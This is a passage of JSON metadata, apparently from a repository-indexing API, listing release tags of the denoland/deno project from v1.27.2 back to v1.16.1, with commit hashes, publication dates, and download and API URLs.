/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c